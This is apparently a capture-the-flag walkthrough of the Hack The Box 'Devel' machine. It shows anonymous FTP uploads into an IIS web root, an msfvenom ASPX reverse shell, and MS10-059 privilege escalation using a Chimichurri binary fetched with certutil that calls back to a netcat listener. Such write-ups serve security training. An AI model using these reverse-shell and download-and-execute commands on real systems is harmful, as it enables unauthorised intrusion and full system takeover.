# Devel

## Nmap

```
nmap 10.10.10.5 -p- -A -T4

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

We have two ports open: 21 (FTP) and 80 (IIS 7.5). To save time I will kick off `gobuster` and `nikto` against port 80 in the background and look at port 21 while they run.

## FTP

From the `nmap` results we can see FTP is running on port 21 and anonymous login is allowed (the `ftp-anon` NSE script runs as part of the default script set selected by `-A`/`-sC`). We log in successfully as shown below:

![ftp on port 21](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2ff67bd26e0e7b7f72dd1512238217d84e87e970%2Fimage.png?alt=media)

We are able to log in as `anonymous` with a blank password. The listing contains the `aspnet_client` directory; following it leads to a subdirectory whose name encodes the .NET Framework version the site runs under, which tells us which ASPX payloads the server can compile.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3330a3c6b6498c3a35c101249a0775f108fd5bac%2Fimage.png?alt=media)

We can note the framework version in case we need it later. The FTP root also contains `iisstart.htm` and `welcome.png`, the default IIS welcome page and its image. Viewing the image confirms the server is running IIS7, consistent with the `Microsoft-IIS/7.5` banner from `nmap`.

![IIS7 welcome.png](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5fb24bbfdee811506e50ef118c32d9ef7eda0273%2Fimage.png?alt=media)

## File Upload

The files in the FTP root (`iisstart.htm`, `welcome.png`, `aspnet_client`) are exactly what sits in a default IIS web root, so the FTP service is most likely rooted in the directory IIS serves. If the anonymous account can also write, anything we upload should be reachable in the browser, and an uploaded ASPX page would be executed by IIS, giving us a reverse shell. First we test with a harmless text file.

![testing ftp file upload](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68d2b7f3216ecf8979abcb6379d524779f18bfb1%2Fimage.png?alt=media)

Browsing to the file over HTTP returns our text, confirming both that the upload worked and that the FTP root is the web root.

## Payload Creation

![file upload on ftp](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-644052759caa0dbe8106f63643b9e01903419509%2Fimage.png?alt=media)

Now we try to upload a reverse shell and get IIS to execute it. As the target is IIS, we want an ASP or ASPX reverse shell; `msfvenom` can generate one.

We need to use the following payload:

```
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx  -o /home/kali/Desktop/upload.aspx
```

{% hint style="info" %}
`windows/shell_reverse_tcp` is a stageless (single) payload, so a plain `netcat` listener can catch it. The staged variant `windows/shell/reverse_tcp` expects Metasploit's `multi/handler` to deliver the second stage and will not give a working shell in `netcat`.
{% endhint %}

I used port 443 for the listener: outbound connections to 443 are usually permitted by egress filtering on web servers, so the callback is more likely to get through than one to an arbitrary high port.

We can upload the payload to the server using the `put` command.

![uploading our payload to the ftp](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-18a2a6292823ae3b4f8d4e7ecdac833655249193%2Fimage.png?alt=media)

## Reverse Shell

Before requesting the payload we need a `netcat` listener to catch the reverse shell. Binding a port below 1024 requires root, so with port 443 the listener must be started with `sudo`.

![setting up a nc listener on port 443](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d7896e41cc938747f12f2685610f360ca02ddd97%2Fimage.png?alt=media)

We can now browse to the uploaded file at `http://10.10.10.5/upload.aspx`; IIS compiles and executes the page, which connects back to our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3c4420d580154e5cb3d016040af7183166cf4dc6%2Fimage.png?alt=media)

![Low privilege shell](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-760cad7e9e538e3bc283718e7986bd3d956f3a36%2Fimage.png?alt=media)

After checking back on `netcat` we have a shell as a low privilege account on the server.

## Privilege Escalation

We should now run `systeminfo` to gather initial information about the system, taking note of the important fields such as OS Name, OS Version, System Type and the installed Hotfix(s).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b898293db146e69cfa39779085d6352900434ea%2Fimage.png?alt=media)

We can take the `systeminfo` information and run this against Windows exploit suggester.

![Window exploit suggester.](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cce2ff687b31bf8da651eda7fc80da8e58a98638%2Fimage.png?alt=media)

The bulletin we are interested in is MS10-059. It is a local elevation-of-privilege flaw in the Tracing Feature for Services, a user-mode Windows component (it is filed under "kernel exploits" in the repository used below, but it is not a kernel bug), and it affects the following:

| Field | Value |
| --- | --- |
| **Vulnerability Identifier** | CVE-2010-2554; CVE-2010-2555 |
| **Risk** | Important |
| **Affected Software** | Windows 7 (32-bit and x64); Windows Server 2008 (32-bit, x64 and Itanium, with and without Service Pack 2); Windows Server 2008 R2 (x64); Windows Vista SP1 and SP2 (32-bit and x64) |
| **Description** | This security update addresses vulnerabilities in the Tracing Feature for Services that could allow elevation of privilege if an attacker runs a specially crafted application. |
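The step of feeding `systeminfo` output to an exploit suggester boils down to parsing the OS version and installed KBs and comparing them with the patches that fix known bulletins. As an added example (not code from the writeup or from Windows-Exploit-Suggester), the parser below does that for a constructed `systeminfo` sample and a one-entry catalogue containing only the bulletin used on this page: MS10-059 shipped as KB982799 for NT 6.0 (Vista / Server 2008) and 6.1 (7 / Server 2008 R2). The sample values, the catalogue structure and the function names are mine.

```python
"""Parse systeminfo output and flag bulletins whose fix is not installed.

Added example, not from the original writeup. SAMPLE_SYSTEMINFO is a
constructed sample in the shape systeminfo prints on a Windows 7 host.
"""
import re
import sys

SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB2999226
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Bulletin -> (KB that fixes it, predicate on the (major, minor) NT version
# it applies to). Only the bulletin used on this page is listed; a real
# catalogue would be loaded from Microsoft's bulletin data.
PATCH_CATALOG = {
    "MS10-059": ("KB982799", lambda v: v[:2] in ((6, 0), (6, 1))),
}


def parse_systeminfo(text):
    """Return os_name, os_version tuple, arch and the list of installed KBs."""
    fields, hotfixes, current = {}, [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            # Continuation line: only the Hotfix(s) block carries KB numbers.
            if current == "Hotfix(s)":
                m = re.search(r"\bKB\d+\b", line)
                if m:
                    hotfixes.append(m.group(0))
            continue
        key, _, value = line.partition(":")
        current = key.strip()
        fields[current] = value.strip()
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", fields.get("OS Version", ""))
    version = tuple(int(x) for x in m.groups()) if m else (0, 0, 0)
    # "X86-based PC" / "x64-based PC" -> "x86" / "x64"
    arch = fields.get("System Type", "").lower().split("-")[0] or "unknown"
    return {"os_name": fields.get("OS Name", ""), "os_version": version,
            "arch": arch, "hotfixes": hotfixes}


def candidate_bulletins(info, catalog=PATCH_CATALOG):
    """Bulletins whose OS range matches and whose fixing KB is not listed.

    systeminfo only reports hotfixes known to WMI and a later cumulative
    update can supersede an older KB, so a hit is a lead to test, not proof.
    """
    return sorted(bulletin for bulletin, (kb, applies) in catalog.items()
                  if applies(info["os_version"]) and kb not in info["hotfixes"])


if __name__ == "__main__":
    # Pass a saved systeminfo dump as the first argument, or use the sample.
    raw = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_SYSTEMINFO
    parsed = parse_systeminfo(raw)
    print(parsed["os_name"], parsed["os_version"], parsed["arch"])
    print("candidates:", candidate_bulletins(parsed))
```

Pick the exploit binary to match `arch`: a 32-bit host needs the x86 build, and an exploit compiled for the wrong architecture simply fails to run.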

In this scenario we are going to use the Chimichurri compiled exploit taken from the following GitHub link:

<https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled>

Once downloaded, we `cd` to the directory containing `Chimichurri.exe` on our attacking machine and serve it with Python's built-in HTTP server:

```
python -m SimpleHTTPServer <PORT>
```

{% hint style="info" %}
If no port is specified Python defaults to port 8000. `SimpleHTTPServer` is the Python 2 module; on Python 3 the equivalent is `python3 -m http.server <PORT>`.
{% endhint %}

We can then use `certutil.exe` on the Windows machine to download the executable from our attacking machine. It saves the file into the current directory under the name from the URL. Note that the Python server on our Linux box matches paths case-sensitively, so the filename in the URL must match the file on disk exactly (`Chimichurri.exe` versus `chimichurri.exe`).

```
certutil.exe -urlcache -split -f "http://<IP>:<PORT>/chimichurri.exe"
```

![Downloading with certutil.exe](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ee5e0d7085473a0a78bf35c72a64e8f8e6a112aa%2Fimage.png?alt=media)

Running the executable with no arguments prints its usage, which shows it takes our IP and a port to connect back to:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a31fcb1b610eca71dea99f383378fd5139019f6b%2Fimage.png?alt=media)

Next we set up a second `netcat` listener on our attacking machine to catch the elevated shell.

```
nc -lvp 4455
```

We can then run `Chimichurri.exe` from the low-privilege shell, giving it our IP and the listener port:

```
Chimichurri.exe 10.10.14.31 4455
```

After a short wait the listener receives a connection and we have a shell as `NT AUTHORITY\SYSTEM`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba310b75053f4f83746cfddf9f46db9a91d2da27%2Fimage.png?alt=media)
